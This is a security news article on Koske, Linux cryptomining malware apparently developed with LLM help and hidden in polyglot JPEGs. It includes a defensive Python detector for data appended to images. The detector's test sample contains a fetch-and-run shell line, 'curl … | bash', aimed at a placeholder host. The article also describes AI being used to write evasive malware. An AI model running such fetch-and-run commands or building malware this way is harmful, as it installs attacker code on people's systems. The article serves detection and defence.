
Sophisticated Koske Linux Malware Developed With AI Aid

The Koske Linux malware shows how cybercriminals can use AI for payload development, persistence, and adaptivity. The post Sophisticated Koske Linux Malware Developed With AI Aid appeared first on SecurityWeek.


Cybercriminals appear to have employed AI to a significant extent in the development of a sophisticated Linux malware named Koske, according to cloud and container security firm Aqua Security. 

Koske is designed to abuse compromised systems for cryptocurrency mining. Depending on the hardware it finds, it deploys CPU- or GPU-optimized miners to use the host's resources to mine Monero, Ravencoin, Nexa, Tari, Zano and more than a dozen other cryptocurrencies.

In attacks observed by Aqua, the malware has been distributed on misconfigured instances of the JupyterLab web-based development environment.

On compromised systems, the attackers install backdoors and download two JPEG image files that look harmless.

These files are actually polyglots: they are valid JPEGs that display an image of a panda when opened, but they also carry malicious code that, once extracted and executed on the host, fetches additional payloads, including a rootkit.
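A first check a responder can run on such files is structural: a JPEG ends at its End Of Image marker, so anything after that marker is foreign data. The following Python is an added example written for this article, not Aqua's code or a sample of Koske; it walks the JPEG segment structure (including the entropy-coded scan data) to find the true end of the image and returns whatever trails it. The sample image and the appended script are constructed here so the code runs offline; `example.invalid` is a placeholder host, not an indicator from the campaign.

```python
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Markers that carry no length field: TEM, SOI, EOI and RST0-RST7
STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))


def jpeg_end_offset(data: bytes) -> int:
    """Return the offset just past the EOI marker, following the segment structure."""
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        while pos < len(data) and data[pos] == 0xFF:   # skip 0xFF fill bytes
            pos += 1
        if pos >= len(data):
            raise ValueError("truncated marker")
        marker = data[pos]
        pos += 1
        if marker == EOI:
            return pos
        if marker in STANDALONE:
            continue
        if pos + 2 > len(data):
            raise ValueError("truncated segment length")
        (length,) = struct.unpack(">H", data[pos:pos + 2])
        if length < 2:
            raise ValueError("bad segment length")
        pos += length   # length includes its own two bytes
        if marker == SOS:
            # Entropy-coded data follows the SOS header. Inside it, 0xFF is either
            # a stuffed byte (FF 00) or a restart marker (FF D0..D7); any other
            # 0xFF xx pair is the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def trailing_payload(data: bytes) -> bytes:
    """Bytes appended after the image proper (empty for a clean file)."""
    return data[jpeg_end_offset(data):]


def inspect_image(data: bytes) -> dict:
    """Summarize how much of the file is image and whether the trailer looks like a script."""
    trailer = trailing_payload(data)
    return {
        "image_bytes": len(data) - len(trailer),
        "trailing_bytes": len(trailer),
        "looks_like_script": trailer.lstrip().startswith(b"#!") or b"bash" in trailer,
    }


def _seg(marker: int, payload: bytes) -> bytes:
    """Build one marker segment with a big-endian length field."""
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed sample: a structurally valid JPEG skeleton (not a viewable picture)
CLEAN_JPEG = (
    b"\xff\xd8"
    + _seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")  # APP0
    + _seg(0xDB, b"\x00" + bytes(64))                               # DQT
    + _seg(0xC0, b"\x08\x00\x08\x00\x08\x01\x01\x11\x00")           # SOF0, 8x8 grayscale
    + _seg(0xC4, b"\x00" + bytes(16))                               # DHT (empty table)
    + _seg(0xDA, b"\x01\x01\x00\x00\x3f\x00")                       # SOS header
    + b"\x12\x34\xff\x00\x56\xff\xd0\x78"                           # scan data: stuffed FF00 and RST0
    + b"\xff\xd9"                                                   # EOI
)
# Constructed payload standing in for an appended stager; host is a placeholder
PAYLOAD = b"#!/bin/bash\ncurl -s http://example.invalid/stage2 | bash\n"
POLYGLOT = CLEAN_JPEG + PAYLOAD

if __name__ == "__main__":
    print(inspect_image(CLEAN_JPEG))
    print(inspect_image(POLYGLOT))
```

Trailing bytes are a strong lead but not proof on their own: some encoders and editing tools leave padding or metadata after EOI, so treat a non-empty trailer as a reason to pull the bytes and look at them (a shebang, shell keywords or compilable C source settle it) rather than as a verdict. Files that raise `ValueError` are not well-formed JPEGs at all and deserve the same scrutiny.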

Aqua researchers believe Koske's development was significantly aided by AI. In their assessment, the malware's developers used LLMs to create modular and evasive payloads, to design persistence mechanisms that leave little trace, and to ensure that the malware automatically adapts to different system conditions.

In terms of adaptability, for instance, the malware uses three different methods to check whether it can reach the GitHub account from which it fetches payloads. If it cannot connect, it resets proxy settings, removes the operating system's iptables firewall rules, and changes the DNS configuration. It can also dynamically discover working proxies for C&C communications.

Aqua's conclusion that AI was likely used to write Koske's code rests on several clues, including "verbose, well-structured comments and modularity" and "best-practice logic flow with defensive scripting habits".

Another noteworthy consequence is that AI-written code tends to look generic, which makes attribution and analysis more difficult.

“While using AI to generate better code already poses a challenge for defenders, it’s only the beginning. The real game-changer is AI-powered malware, which is malicious software that dynamically interacts with AI models to adapt its behavior in real-time. This kind of capability could mark a meteoric leap in adversaries’ tactics, putting countless systems at serious risk,” Aqua Security warned.
